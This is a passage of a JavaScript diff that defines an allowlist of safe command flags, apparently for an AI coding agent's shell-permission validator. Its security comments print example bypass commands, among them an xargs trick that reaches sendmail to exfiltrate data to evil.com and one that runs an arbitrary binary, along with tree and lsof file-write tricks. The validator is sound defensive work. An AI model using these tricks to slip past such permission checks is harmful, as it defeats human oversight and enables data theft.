+ "--follow": "none",
54
+ "-p": "none",
55
+ "--full-path": "none",
56
+ "-0": "none",
57
+ "--print0": "none",
58
+ "-d": "number",
59
+ "--max-depth": "number",
60
+ "--min-depth": "number",
61
+ "--exact-depth": "number",
62
+ "-t": "string",
63
+ "--type": "string",
64
+ "-e": "string",
65
+ "--extension": "string",
66
+ "-S": "string",
67
+ "--size": "string",
68
+ "--changed-within": "string",
69
+ "--changed-before": "string",
70
+ "-o": "string",
71
+ "--owner": "string",
72
+ "-E": "string",
73
+ "--exclude": "string",
74
+ "--ignore-file": "string",
75
+ "-c": "string",
76
+ "--color": "string",
77
+ "-j": "number",
78
+ "--threads": "number",
79
+ "--max-buffer-time": "string",
80
+ "--max-results": "number",
81
+ "-1": "none",
82
+ "-q": "none",
83
+ "--quiet": "none",
84
+ "--show-errors": "none",
85
+ "--strip-cwd-prefix": "none",
86
+ "--one-file-system": "none",
87
+ "--prune": "none",
88
+ "--search-path": "string",
89
+ "--base-directory": "string",
90
+ "--path-separator": "string",
91
+ "--batch-size": "number",
92
+ "--no-require-git": "none",
93
+ "--hyperlink": "string",
94
+ "--and": "string",
95
+ "--format": "string"
96
+ };
97
+ const COMMAND_ALLOWLIST = {
98
+ xargs: {
99
+ safeFlags: {
100
+ "-I": "{}",
101
+ // SECURITY: `-i` and `-e` (lowercase) REMOVED — both use GNU getopt
102
+ // optional-attached-arg semantics (`i::`, `e::`). The arg MUST be
103
+ // attached (`-iX`, `-eX`); space-separated (`-i X`, `-e X`) means the
104
+ // flag takes NO arg and `X` becomes the next positional (target command).
105
+ //
106
+ // `-i` (`i::` — optional replace-str):
107
+ // echo /usr/sbin/sendm | xargs -it tail a@evil.com
108
+ // validator: -it bundle (both 'none') OK, tail ∈ SAFE_TARGET → break
109
+ // GNU: -i replace-str=t, tail → /usr/sbin/sendmail → NETWORK EXFIL
110
+ //
111
+ // `-e` (`e::` — optional eof-str):
112
+ // cat data | xargs -e EOF echo foo
113
+ // validator: -e consumes 'EOF' as arg (type 'EOF'), echo ∈ SAFE_TARGET
114
+ // GNU: -e no attached arg → no eof-str, 'EOF' is the TARGET COMMAND
115
+ // → executes binary named EOF from PATH → CODE EXEC (malicious repo)
116
+ //
117
+ // Use uppercase `-I {}` (mandatory arg) and `-E EOF` (POSIX, mandatory
118
+ // arg) instead — both validator and xargs agree on argument consumption.
119
+ // `-i`/`-e` are deprecated (GNU: "use -I instead" / "use -E instead").
120
+ "-n": "number",
121
+ "-P": "number",
122
+ "-L": "number",
123
+ "-s": "number",
124
+ "-E": "EOF",
125
+ // POSIX, MANDATORY separate arg — validator & xargs agree
126
+ "-0": "none",
127
+ "-t": "none",
128
+ "-r": "none",
129
+ "-x": "none",
130
+ "-d": "char"
131
+ }
132
+ },
133
+ // All git read-only commands from shared validation map
134
+ ...GIT_READ_ONLY_COMMANDS,
135
+ file: {
136
+ safeFlags: {
137
+ // Output format flags
138
+ "--brief": "none",
139
+ "-b": "none",
140
+ "--mime": "none",
141
+ "-i": "none",
142
+ "--mime-type": "none",
143
+ "--mime-encoding": "none",
144
+ "--apple": "none",
145
+ // Behavior flags
146
+ "--check-encoding": "none",
147
+ "-c": "none",
148
+ "--exclude": "string",
149
+ "--exclude-quiet": "string",
150
+ "--print0": "none",
151
+ "-0": "none",
152
+ "-f": "string",
153
+ "-F": "string",
154
+ "--separator": "string",
155
+ "--help": "none",
156
+ "--version": "none",
157
+ "-v": "none",
158
+ // Following/dereferencing
159
+ "--no-dereference": "none",
160
+ "-h": "none",
161
+ "--dereference": "none",
162
+ "-L": "none",
163
+ // Magic file options (safe when just reading)
164
+ "--magic-file": "string",
165
+ "-m": "string",
166
+ // Other safe options
167
+ "--keep-going": "none",
168
+ "-k": "none",
169
+ "--list": "none",
170
+ "-l": "none",
171
+ "--no-buffer": "none",
172
+ "-n": "none",
173
+ "--preserve-date": "none",
174
+ "-p": "none",
175
+ "--raw": "none",
176
+ "-r": "none",
177
+ "-s": "none",
178
+ "--special-files": "none",
179
+ // Uncompress flag for archives
180
+ "--uncompress": "none",
181
+ "-z": "none"
182
+ }
183
+ },
184
+ sed: {
185
+ safeFlags: {
186
+ // Expression flags
187
+ "--expression": "string",
188
+ "-e": "string",
189
+ // Output control
190
+ "--quiet": "none",
191
+ "--silent": "none",
192
+ "-n": "none",
193
+ // Extended regex
194
+ "--regexp-extended": "none",
195
+ "-r": "none",
196
+ "--posix": "none",
197
+ "-E": "none",
198
+ // Line handling
199
+ "--line-length": "number",
200
+ "-l": "number",
201
+ "--zero-terminated": "none",
202
+ "-z": "none",
203
+ "--separate": "none",
204
+ "-s": "none",
205
+ "--unbuffered": "none",
206
+ "-u": "none",
207
+ // Debugging/help
208
+ "--debug": "none",
209
+ "--help": "none",
210
+ "--version": "none"
211
+ },
212
+ additionalCommandIsDangerousCallback: (rawCommand, _args) => !sedCommandIsAllowedByAllowlist(rawCommand)
213
+ },
214
+ sort: {
215
+ safeFlags: {
216
+ // Sorting options
217
+ "--ignore-leading-blanks": "none",
218
+ "-b": "none",
219
+ "--dictionary-order": "none",
220
+ "-d": "none",
221
+ "--ignore-case": "none",
222
+ "-f": "none",
223
+ "--general-numeric-sort": "none",
224
+ "-g": "none",
225
+ "--human-numeric-sort": "none",
226
+ "-h": "none",
227
+ "--ignore-nonprinting": "none",
228
+ "-i": "none",
229
+ "--month-sort": "none",
230
+ "-M": "none",
231
+ "--numeric-sort": "none",
232
+ "-n": "none",
233
+ "--random-sort": "none",
234
+ "-R": "none",
235
+ "--reverse": "none",
236
+ "-r": "none",
237
+ "--sort": "string",
238
+ "--stable": "none",
239
+ "-s": "none",
240
+ "--unique": "none",
241
+ "-u": "none",
242
+ "--version-sort": "none",
243
+ "-V": "none",
244
+ "--zero-terminated": "none",
245
+ "-z": "none",
246
+ // Key specifications
247
+ "--key": "string",
248
+ "-k": "string",
249
+ "--field-separator": "string",
250
+ "-t": "string",
251
+ // Checking
252
+ "--check": "none",
253
+ "-c": "none",
254
+ "--check-char-order": "none",
255
+ "-C": "none",
256
+ // Merging
257
+ "--merge": "none",
258
+ "-m": "none",
259
+ // Buffer size
260
+ "--buffer-size": "string",
261
+ "-S": "string",
262
+ // Parallel processing
263
+ "--parallel": "number",
264
+ // Batch size
265
+ "--batch-size": "number",
266
+ // Help and version
267
+ "--help": "none",
268
+ "--version": "none"
269
+ }
270
+ },
271
+ man: {
272
+ safeFlags: {
273
+ // Safe display options
274
+ "-a": "none",
275
+ // Display all manual pages
276
+ "--all": "none",
277
+ // Same as -a
278
+ "-d": "none",
279
+ // Debug mode
280
+ "-f": "none",
281
+ // Emulate whatis
282
+ "--whatis": "none",
283
+ // Same as -f
284
+ "-h": "none",
285
+ // Help
286
+ "-k": "none",
287
+ // Emulate apropos
288
+ "--apropos": "none",
289
+ // Same as -k
290
+ "-l": "string",
291
+ // Local file (safe for reading, Linux only)
292
+ "-w": "none",
293
+ // Display location instead of content
294
+ // Safe formatting options
295
+ "-S": "string",
296
+ // Restrict manual sections
297
+ "-s": "string"
298
+ // Same as -S for whatis/apropos mode
299
+ }
300
+ },
301
+ // help command - only allow bash builtin help flags to prevent attacks when
302
+ // help is aliased to man (e.g., in oh-my-zsh common-aliases plugin).
303
+ // man's -P flag allows arbitrary command execution via pager.
304
+ help: {
305
+ safeFlags: {
306
+ "-d": "none",
307
+ // Output short description for each topic
308
+ "-m": "none",
309
+ // Display usage in pseudo-manpage format
310
+ "-s": "none"
311
+ // Output only a short usage synopsis
312
+ }
313
+ },
314
+ netstat: {
315
+ safeFlags: {
316
+ // Safe display options
317
+ "-a": "none",
318
+ // Show all sockets
319
+ "-L": "none",
320
+ // Show listen queue sizes
321
+ "-l": "none",
322
+ // Print full IPv6 address
323
+ "-n": "none",
324
+ // Show network addresses as numbers
325
+ // Safe filtering options
326
+ "-f": "string",
327
+ // Address family (inet, inet6, unix, vsock)
328
+ // Safe interface options
329
+ "-g": "none",
330
+ // Show multicast group membership
331
+ "-i": "none",
332
+ // Show interface state
333
+ "-I": "string",
334
+ // Specific interface
335
+ // Safe statistics options
336
+ "-s": "none",
337
+ // Show per-protocol statistics
338
+ // Safe routing options
339
+ "-r": "none",
340
+ // Show routing tables
341
+ // Safe mbuf options
342
+ "-m": "none",
343
+ // Show memory management statistics
344
+ // Safe other options
345
+ "-v": "none"
346
+ // Increase verbosity
347
+ }
348
+ },
349
+ ps: {
350
+ safeFlags: {
351
+ // UNIX-style process selection (these are safe)
352
+ "-e": "none",
353
+ // Select all processes
354
+ "-A": "none",
355
+ // Select all processes (same as -e)
356
+ "-a": "none",
357
+ // Select all with tty except session leaders
358
+ "-d": "none",
359
+ // Select all except session leaders
360
+ "-N": "none",
361
+ // Negate selection
362
+ "--deselect": "none",
363
+ // UNIX-style output format (safe, doesn't show env)
364
+ "-f": "none",
365
+ // Full format
366
+ "-F": "none",
367
+ // Extra full format
368
+ "-l": "none",
369
+ // Long format
370
+ "-j": "none",
371
+ // Jobs format
372
+ "-y": "none",
373
+ // Don't show flags
374
+ // Output modifiers (safe ones)
375
+ "-w": "none",
376
+ // Wide output
377
+ "-ww": "none",
378
+ // Unlimited width
379
+ "--width": "number",
380
+ "-c": "none",
381
+ // Show scheduler info
382
+ "-H": "none",
383
+ // Show process hierarchy
384
+ "--forest": "none",
385
+ "--headers": "none",
386
+ "--no-headers": "none",
387
+ "-n": "string",
388
+ // Set namelist file
389
+ "--sort": "string",
390
+ // Thread display
391
+ "-L": "none",
392
+ // Show threads
393
+ "-T": "none",
394
+ // Show threads
395
+ "-m": "none",
396
+ // Show threads after processes
397
+ // Process selection by criteria
398
+ "-C": "string",
399
+ // By command name
400
+ "-G": "string",
401
+ // By real group ID
402
+ "-g": "string",
403
+ // By session or effective group
404
+ "-p": "string",
405
+ // By PID
406
+ "--pid": "string",
407
+ "-q": "string",
408
+ // Quick mode by PID
409
+ "--quick-pid": "string",
410
+ "-s": "string",
411
+ // By session ID
412
+ "--sid": "string",
413
+ "-t": "string",
414
+ // By tty
415
+ "--tty": "string",
416
+ "-U": "string",
417
+ // By real user ID
418
+ "-u": "string",
419
+ // By effective user ID
420
+ "--user": "string",
421
+ // Help/version
422
+ "--help": "none",
423
+ "--info": "none",
424
+ "-V": "none",
425
+ "--version": "none"
426
+ },
427
+ // Block BSD-style 'e' modifier which shows environment variables
428
+ // BSD options are letter-only tokens without a leading dash
429
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => {
430
+ return args.some(
431
+ (a) => !a.startsWith("-") && /^[a-zA-Z]*e[a-zA-Z]*$/.test(a)
432
+ );
433
+ }
434
+ },
435
+ base64: {
436
+ respectsDoubleDash: false,
437
+ // macOS base64 does not respect POSIX --
438
+ safeFlags: {
439
+ // Safe decode options
440
+ "-d": "none",
441
+ // Decode
442
+ "-D": "none",
443
+ // Decode (macOS)
444
+ "--decode": "none",
445
+ // Decode
446
+ // Safe formatting options
447
+ "-b": "number",
448
+ // Break lines at num (macOS)
449
+ "--break": "number",
450
+ // Break lines at num (macOS)
451
+ "-w": "number",
452
+ // Wrap lines at COLS (Linux)
453
+ "--wrap": "number",
454
+ // Wrap lines at COLS (Linux)
455
+ // Safe input options (read from file, not write)
456
+ "-i": "string",
457
+ // Input file (safe for reading)
458
+ "--input": "string",
459
+ // Input file (safe for reading)
460
+ // Safe misc options
461
+ "--ignore-garbage": "none",
462
+ // Ignore non-alphabet chars when decoding (Linux)
463
+ "-h": "none",
464
+ // Help
465
+ "--help": "none",
466
+ // Help
467
+ "--version": "none"
468
+ // Version
469
+ }
470
+ },
471
+ grep: {
472
+ safeFlags: {
473
+ // Pattern flags
474
+ "-e": "string",
475
+ // Pattern
476
+ "--regexp": "string",
477
+ "-f": "string",
478
+ // File with patterns
479
+ "--file": "string",
480
+ "-F": "none",
481
+ // Fixed strings
482
+ "--fixed-strings": "none",
483
+ "-G": "none",
484
+ // Basic regexp (default)
485
+ "--basic-regexp": "none",
486
+ "-E": "none",
487
+ // Extended regexp
488
+ "--extended-regexp": "none",
489
+ "-P": "none",
490
+ // Perl regexp
491
+ "--perl-regexp": "none",
492
+ // Matching control
493
+ "-i": "none",
494
+ // Ignore case
495
+ "--ignore-case": "none",
496
+ "--no-ignore-case": "none",
497
+ "-v": "none",
498
+ // Invert match
499
+ "--invert-match": "none",
500
+ "-w": "none",
501
+ // Word regexp
502
+ "--word-regexp": "none",
503
+ "-x": "none",
504
+ // Line regexp
505
+ "--line-regexp": "none",
506
+ // Output control
507
+ "-c": "none",
508
+ // Count
509
+ "--count": "none",
510
+ "--color": "string",
511
+ "--colour": "string",
512
+ "-L": "none",
513
+ // Files without match
514
+ "--files-without-match": "none",
515
+ "-l": "none",
516
+ // Files with matches
517
+ "--files-with-matches": "none",
518
+ "-m": "number",
519
+ // Max count
520
+ "--max-count": "number",
521
+ "-o": "none",
522
+ // Only matching
523
+ "--only-matching": "none",
524
+ "-q": "none",
525
+ // Quiet
526
+ "--quiet": "none",
527
+ "--silent": "none",
528
+ "-s": "none",
529
+ // No messages
530
+ "--no-messages": "none",
531
+ // Output line prefix
532
+ "-b": "none",
533
+ // Byte offset
534
+ "--byte-offset": "none",
535
+ "-H": "none",
536
+ // With filename
537
+ "--with-filename": "none",
538
+ "-h": "none",
539
+ // No filename
540
+ "--no-filename": "none",
541
+ "--label": "string",
542
+ "-n": "none",
543
+ // Line number
544
+ "--line-number": "none",
545
+ "-T": "none",
546
+ // Initial tab
547
+ "--initial-tab": "none",
548
+ "-u": "none",
549
+ // Unix byte offsets
550
+ "--unix-byte-offsets": "none",
551
+ "-Z": "none",
552
+ // Null after filename
553
+ "--null": "none",
554
+ "-z": "none",
555
+ // Null data
556
+ "--null-data": "none",
557
+ // Context control
558
+ "-A": "number",
559
+ // After context
560
+ "--after-context": "number",
561
+ "-B": "number",
562
+ // Before context
563
+ "--before-context": "number",
564
+ "-C": "number",
565
+ // Context
566
+ "--context": "number",
567
+ "--group-separator": "string",
568
+ "--no-group-separator": "none",
569
+ // File and directory selection
570
+ "-a": "none",
571
+ // Text (process binary as text)
572
+ "--text": "none",
573
+ "--binary-files": "string",
574
+ "-D": "string",
575
+ // Devices
576
+ "--devices": "string",
577
+ "-d": "string",
578
+ // Directories
579
+ "--directories": "string",
580
+ "--exclude": "string",
581
+ "--exclude-from": "string",
582
+ "--exclude-dir": "string",
583
+ "--include": "string",
584
+ "-r": "none",
585
+ // Recursive
586
+ "--recursive": "none",
587
+ "-R": "none",
588
+ // Dereference-recursive
589
+ "--dereference-recursive": "none",
590
+ // Other options
591
+ "--line-buffered": "none",
592
+ "-U": "none",
593
+ // Binary
594
+ "--binary": "none",
595
+ // Help and version
596
+ "--help": "none",
597
+ "-V": "none",
598
+ "--version": "none"
599
+ }
600
+ },
601
+ ...RIPGREP_READ_ONLY_COMMANDS,
602
+ // Checksum commands - these only read files and compute/verify hashes
603
+ // All flags are safe as they only affect output format or verification behavior
604
+ sha256sum: {
605
+ safeFlags: {
606
+ // Mode flags
607
+ "-b": "none",
608
+ // Binary mode
609
+ "--binary": "none",
610
+ "-t": "none",
611
+ // Text mode
612
+ "--text": "none",
613
+ // Check/verify flags
614
+ "-c": "none",
615
+ // Verify checksums from file
616
+ "--check": "none",
617
+ "--ignore-missing": "none",
618
+ // Ignore missing files during check
619
+ "--quiet": "none",
620
+ // Quiet mode during check
621
+ "--status": "none",
622
+ // Don't output, exit code shows success
623
+ "--strict": "none",
624
+ // Exit non-zero for improperly formatted lines
625
+ "-w": "none",
626
+ // Warn about improperly formatted lines
627
+ "--warn": "none",
628
+ // Output format flags
629
+ "--tag": "none",
630
+ // BSD-style output
631
+ "-z": "none",
632
+ // End output lines with NUL
633
+ "--zero": "none",
634
+ // Help and version
635
+ "--help": "none",
636
+ "--version": "none"
637
+ }
638
+ },
639
+ sha1sum: {
640
+ safeFlags: {
641
+ // Mode flags
642
+ "-b": "none",
643
+ // Binary mode
644
+ "--binary": "none",
645
+ "-t": "none",
646
+ // Text mode
647
+ "--text": "none",
648
+ // Check/verify flags
649
+ "-c": "none",
650
+ // Verify checksums from file
651
+ "--check": "none",
652
+ "--ignore-missing": "none",
653
+ // Ignore missing files during check
654
+ "--quiet": "none",
655
+ // Quiet mode during check
656
+ "--status": "none",
657
+ // Don't output, exit code shows success
658
+ "--strict": "none",
659
+ // Exit non-zero for improperly formatted lines
660
+ "-w": "none",
661
+ // Warn about improperly formatted lines
662
+ "--warn": "none",
663
+ // Output format flags
664
+ "--tag": "none",
665
+ // BSD-style output
666
+ "-z": "none",
667
+ // End output lines with NUL
668
+ "--zero": "none",
669
+ // Help and version
670
+ "--help": "none",
671
+ "--version": "none"
672
+ }
673
+ },
674
+ md5sum: {
675
+ safeFlags: {
676
+ // Mode flags
677
+ "-b": "none",
678
+ // Binary mode
679
+ "--binary": "none",
680
+ "-t": "none",
681
+ // Text mode
682
+ "--text": "none",
683
+ // Check/verify flags
684
+ "-c": "none",
685
+ // Verify checksums from file
686
+ "--check": "none",
687
+ "--ignore-missing": "none",
688
+ // Ignore missing files during check
689
+ "--quiet": "none",
690
+ // Quiet mode during check
691
+ "--status": "none",
692
+ // Don't output, exit code shows success
693
+ "--strict": "none",
694
+ // Exit non-zero for improperly formatted lines
695
+ "-w": "none",
696
+ // Warn about improperly formatted lines
697
+ "--warn": "none",
698
+ // Output format flags
699
+ "--tag": "none",
700
+ // BSD-style output
701
+ "-z": "none",
702
+ // End output lines with NUL
703
+ "--zero": "none",
704
+ // Help and version
705
+ "--help": "none",
706
+ "--version": "none"
707
+ }
708
+ },
709
+ // tree command - moved from READONLY_COMMAND_REGEXES to allow flags and path arguments
710
+ // -o/--output writes to a file, so it's excluded. All other flags are display/filter options.
711
+ tree: {
712
+ safeFlags: {
713
+ // Listing options
714
+ "-a": "none",
715
+ // All files
716
+ "-d": "none",
717
+ // Directories only
718
+ "-l": "none",
719
+ // Follow symlinks
720
+ "-f": "none",
721
+ // Full path prefix
722
+ "-x": "none",
723
+ // Stay on current filesystem
724
+ "-L": "number",
725
+ // Max depth
726
+ // SECURITY: -R REMOVED. tree -R combined with -H (HTML mode) and -L (depth)
727
+ // WRITES 00Tree.html files to every subdirectory at the depth boundary.
728
+ // From man tree (< 2.1.0): "-R — at each of them execute tree again
729
+ // adding `-o 00Tree.html` as a new option." The comment "Rerun at max
730
+ // depth" was misleading — the "rerun" includes a hardcoded -o file write.
731
+ // `tree -R -H . -L 2 /path` → writes /path/<subdir>/00Tree.html for each
732
+ // subdir at depth 2. FILE WRITE, zero permissions.
733
+ "-P": "string",
734
+ // Include pattern
735
+ "-I": "string",
736
+ // Exclude pattern
737
+ "--gitignore": "none",
738
+ "--gitfile": "string",
739
+ "--ignore-case": "none",
740
+ "--matchdirs": "none",
741
+ "--metafirst": "none",
742
+ "--prune": "none",
743
+ "--info": "none",
744
+ "--infofile": "string",
745
+ "--noreport": "none",
746
+ "--charset": "string",
747
+ "--filelimit": "number",
748
+ // File display options
749
+ "-q": "none",
750
+ // Non-printable as ?
751
+ "-N": "none",
752
+ // Non-printable as-is
753
+ "-Q": "none",
754
+ // Quote filenames
755
+ "-p": "none",
756
+ // Protections
757
+ "-u": "none",
758
+ // Owner
759
+ "-g": "none",
760
+ // Group
761
+ "-s": "none",
762
+ // Size bytes
763
+ "-h": "none",
764
+ // Human-readable sizes
765
+ "--si": "none",
766
+ "--du": "none",
767
+ "-D": "none",
768
+ // Last modification time
769
+ "--timefmt": "string",
770
+ "-F": "none",
771
+ // Append indicator
772
+ "--inodes": "none",
773
+ "--device": "none",
774
+ // Sorting options
775
+ "-v": "none",
776
+ // Version sort
777
+ "-t": "none",
778
+ // Sort by mtime
779
+ "-c": "none",
780
+ // Sort by ctime
781
+ "-U": "none",
782
+ // Unsorted
783
+ "-r": "none",
784
+ // Reverse sort
785
+ "--dirsfirst": "none",
786
+ "--filesfirst": "none",
787
+ "--sort": "string",
788
+ // Graphics/output options
789
+ "-i": "none",
790
+ // No indentation lines
791
+ "-A": "none",
792
+ // ANSI line graphics
793
+ "-S": "none",
794
+ // CP437 line graphics
795
+ "-n": "none",
796
+ // No color
797
+ "-C": "none",
798
+ // Color
799
+ "-X": "none",
800
+ // XML output
801
+ "-J": "none",
802
+ // JSON output
803
+ "-H": "string",
804
+ // HTML output with base HREF
805
+ "--nolinks": "none",
806
+ "--hintro": "string",
807
+ "--houtro": "string",
808
+ "-T": "string",
809
+ // HTML title
810
+ "--hyperlink": "none",
811
+ "--scheme": "string",
812
+ "--authority": "string",
813
+ // Input options (read from file, not write)
814
+ "--fromfile": "none",
815
+ "--fromtabfile": "none",
816
+ "--fflinks": "none",
817
+ // Help and version
818
+ "--help": "none",
819
+ "--version": "none"
820
+ }
821
+ },
822
+ // date command - moved from READONLY_COMMANDS because -s/--set can set system time
823
+ // Also -f/--file can be used to read dates from file and set time
824
+ // We only allow safe display options
825
+ date: {
826
+ safeFlags: {
827
+ // Display options (safe - don't modify system time)
828
+ "-d": "string",
829
+ // --date=STRING - display time described by STRING
830
+ "--date": "string",
831
+ "-r": "string",
832
+ // --reference=FILE - display file's modification time
833
+ "--reference": "string",
834
+ "-u": "none",
835
+ // --utc - use UTC
836
+ "--utc": "none",
837
+ "--universal": "none",
838
+ // Output format options
839
+ "-I": "none",
840
+ // --iso-8601 (can have optional argument, but none type handles bare flag)
841
+ "--iso-8601": "string",
842
+ "-R": "none",
843
+ // --rfc-email
844
+ "--rfc-email": "none",
845
+ "--rfc-3339": "string",
846
+ // Debug/help
847
+ "--debug": "none",
848
+ "--help": "none",
849
+ "--version": "none"
850
+ },
851
+ // Dangerous flags NOT included (blocked by omission):
852
+ // -s / --set - sets system time
853
+ // -f / --file - reads dates from file (can be used to set time in batch)
854
+ // CRITICAL: date positional args in format MMDDhhmm[[CC]YY][.ss] set system time
855
+ // Use callback to verify positional args start with + (format strings like +"%Y-%m-%d")
856
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => {
857
+ const flagsWithArgs = /* @__PURE__ */ new Set([
858
+ "-d",
859
+ "--date",
860
+ "-r",
861
+ "--reference",
862
+ "--iso-8601",
863
+ "--rfc-3339"
864
+ ]);
865
+ let i = 0;
866
+ while (i < args.length) {
867
+ const token = args[i];
868
+ if (token.startsWith("--") && token.includes("=")) {
869
+ i++;
870
+ } else if (token.startsWith("-")) {
871
+ if (flagsWithArgs.has(token)) {
872
+ i += 2;
873
+ } else {
874
+ i++;
875
+ }
876
+ } else {
877
+ if (!token.startsWith("+")) {
878
+ return true;
879
+ }
880
+ i++;
881
+ }
882
+ }
883
+ return false;
884
+ }
885
+ },
886
+ // hostname command - moved from READONLY_COMMANDS because positional args set hostname
887
+ // Also -F/--file sets hostname from file, -b/--boot sets default hostname
888
+ // We only allow safe display options and BLOCK any positional arguments
889
+ hostname: {
890
+ safeFlags: {
891
+ // Display options only (safe)
892
+ "-f": "none",
893
+ // --fqdn - display FQDN
894
+ "--fqdn": "none",
895
+ "--long": "none",
896
+ "-s": "none",
897
+ // --short - display short name
898
+ "--short": "none",
899
+ "-i": "none",
900
+ // --ip-address
901
+ "--ip-address": "none",
902
+ "-I": "none",
903
+ // --all-ip-addresses
904
+ "--all-ip-addresses": "none",
905
+ "-a": "none",
906
+ // --alias
907
+ "--alias": "none",
908
+ "-d": "none",
909
+ // --domain
910
+ "--domain": "none",
911
+ "-A": "none",
912
+ // --all-fqdns
913
+ "--all-fqdns": "none",
914
+ "-v": "none",
915
+ // --verbose
916
+ "--verbose": "none",
917
+ "-h": "none",
918
+ // --help
919
+ "--help": "none",
920
+ "-V": "none",
921
+ // --version
922
+ "--version": "none"
923
+ },
924
+ // CRITICAL: Block any positional arguments - they set the hostname
925
+ // Also block -F/--file, -b/--boot, -y/--yp/--nis (not in safeFlags = blocked)
926
+ // Use regex to ensure no positional args after flags
927
+ regex: /^hostname(?:\s+(?:-[a-zA-Z]|--[a-zA-Z-]+))*\s*$/
928
+ },
929
+ // info command - moved from READONLY_COMMANDS because -o/--output writes to files
930
+ // Also --dribble writes keystrokes to file, --init-file loads custom config
931
+ // We only allow safe display/navigation options
932
+ info: {
933
+ safeFlags: {
934
+ // Navigation/display options (safe)
935
+ "-f": "string",
936
+ // --file - specify manual file to read
937
+ "--file": "string",
938
+ "-d": "string",
939
+ // --directory - search path
940
+ "--directory": "string",
941
+ "-n": "string",
942
+ // --node - specify node
943
+ "--node": "string",
944
+ "-a": "none",
945
+ // --all
946
+ "--all": "none",
947
+ "-k": "string",
948
+ // --apropos - search
949
+ "--apropos": "string",
950
+ "-w": "none",
951
+ // --where - show location
952
+ "--where": "none",
953
+ "--location": "none",
954
+ "--show-options": "none",
955
+ "--vi-keys": "none",
956
+ "--subnodes": "none",
957
+ "-h": "none",
958
+ "--help": "none",
959
+ "--usage": "none",
960
+ "--version": "none"
961
+ }
962
+ // Dangerous flags NOT included (blocked by omission):
963
+ // -o / --output - writes output to file
964
+ // --dribble - records keystrokes to file
965
+ // --init-file - loads custom config (potential code execution)
966
+ // --restore - replays keystrokes from file
967
+ },
968
+ lsof: {
969
+ safeFlags: {
970
+ "-?": "none",
971
+ "-h": "none",
972
+ "-v": "none",
973
+ "-a": "none",
974
+ "-b": "none",
975
+ "-C": "none",
976
+ "-l": "none",
977
+ "-n": "none",
978
+ "-N": "none",
979
+ "-O": "none",
980
+ "-P": "none",
981
+ "-Q": "none",
982
+ "-R": "none",
983
+ "-t": "none",
984
+ "-U": "none",
985
+ "-V": "none",
986
+ "-X": "none",
987
+ "-H": "none",
988
+ "-E": "none",
989
+ "-F": "none",
990
+ "-g": "none",
991
+ "-i": "none",
992
+ "-K": "none",
993
+ "-L": "none",
994
+ "-o": "none",
995
+ "-r": "none",
996
+ "-s": "none",
997
+ "-S": "none",
998
+ "-T": "none",
999
+ "-x": "none",
1000
+ "-A": "string",
1001
+ "-c": "string",
1002
+ "-d": "string",
1003
+ "-e": "string",
1004
+ "-k": "string",
1005
+ "-p": "string",
1006
+ "-u": "string"
1007
+ // OMITTED (writes to disk): -D (device cache file build/update)
1008
+ },
1009
+ // Block +m (create mount supplement file) — writes to disk.
1010
+ // +prefix flags are treated as positional args by validateFlags,
1011
+ // so we must catch them here. lsof accepts +m<path> (attached path, no space)
1012
+ // with both absolute (+m/tmp/evil) and relative (+mfoo, +m.evil) paths.
1013
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => args.some((a) => a === "+m" || a.startsWith("+m"))
1014
+ },
1015
+ pgrep: {
1016
+ safeFlags: {
1017
+ "-d": "string",
1018
+ "--delimiter": "string",
1019
+ "-l": "none",
1020
+ "--list-name": "none",
1021
+ "-a": "none",
1022
+ "--list-full": "none",
1023
+ "-v": "none",
1024
+ "--inverse": "none",
1025
+ "-w": "none",
1026
+ "--lightweight": "none",
1027
+ "-c": "none",
1028
+ "--count": "none",
1029
+ "-f": "none",
1030
+ "--full": "none",
1031
+ "-g": "string",
1032
+ "--pgroup": "string",
1033
+ "-G": "string",
1034
+ "--group": "string",
1035
+ "-i": "none",
1036
+ "--ignore-case": "none",
1037
+ "-n": "none",
1038
+ "--newest": "none",
1039
+ "-o": "none",
1040
+ "--oldest": "none",
1041
+ "-O": "string",
1042
+ "--older": "string",
1043
+ "-P": "string",
1044
+ "--parent": "string",
1045
+ "-s": "string",
1046
+ "--session": "string",
1047
+ "-t": "string",
1048
+ "--terminal": "string",
1049
+ "-u": "string",
1050
+ "--euid": "string",
1051
+ "-U": "string",
1052
+ "--uid": "string",
1053
+ "-x": "none",
1054
+ "--exact": "none",
1055
+ "-F": "string",
1056
+ "--pidfile": "string",
1057
+ "-L": "none",
1058
+ "--logpidfile": "none",
1059
+ "-r": "string",
1060
+ "--runstates": "string",
1061
+ "--ns": "string",
1062
+ "--nslist": "string",
1063
+ "--help": "none",
1064
+ "-V": "none",
1065
+ "--version": "none"
1066
+ }
1067
+ },
1068
+ tput: {
1069
+ safeFlags: {
1070
+ "-T": "string",
1071
+ "-V": "none",
1072
+ "-x": "none"
1073
+ // SECURITY: -S (read capability names from stdin) deliberately EXCLUDED.
1074
+ // It must NOT be in safeFlags because validateFlags unbundles combined
1075
+ // short flags (e.g., -xS → -x + -S), but the callback receives the raw
1076
+ // token '-xS' and only checks exact match 'token === "-S"'. Excluding -S
1077
+ // from safeFlags ensures validateFlags rejects it (bundled or not) before
1078
+ // the callback runs. The callback's -S check is defense-in-depth.
1079
+ },
1080
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => {
1081
+ const DANGEROUS_CAPABILITIES = /* @__PURE__ */ new Set([
1082
+ "init",
1083
+ "reset",
1084
+ "rs1",
1085
+ "rs2",
1086
+ "rs3",
1087
+ "is1",
1088
+ "is2",
1089
+ "is3",
1090
+ "iprog",
1091
+ "if",
1092
+ "rf",
1093
+ "clear",
1094
+ "flash",
1095
+ "mc0",
1096
+ "mc4",
1097
+ "mc5",
1098
+ "mc5i",
1099
+ "mc5p",
1100
+ "pfkey",
1101
+ "pfloc",
1102
+ "pfx",
1103
+ "pfxl",
1104
+ "smcup",
1105
+ "rmcup"
1106
+ ]);
1107
+ const flagsWithArgs = /* @__PURE__ */ new Set(["-T"]);
1108
+ let i = 0;
1109
+ let afterDoubleDash = false;
1110
+ while (i < args.length) {
1111
+ const token = args[i];
1112
+ if (token === "--") {
1113
+ afterDoubleDash = true;
1114
+ i++;
1115
+ } else if (!afterDoubleDash && token.startsWith("-")) {
1116
+ if (token === "-S") return true;
1117
+ if (!token.startsWith("--") && token.length > 2 && token.includes("S"))
1118
+ return true;
1119
+ if (flagsWithArgs.has(token)) {
1120
+ i += 2;
1121
+ } else {
1122
+ i++;
1123
+ }
1124
+ } else {
1125
+ if (DANGEROUS_CAPABILITIES.has(token)) return true;
1126
+ i++;
1127
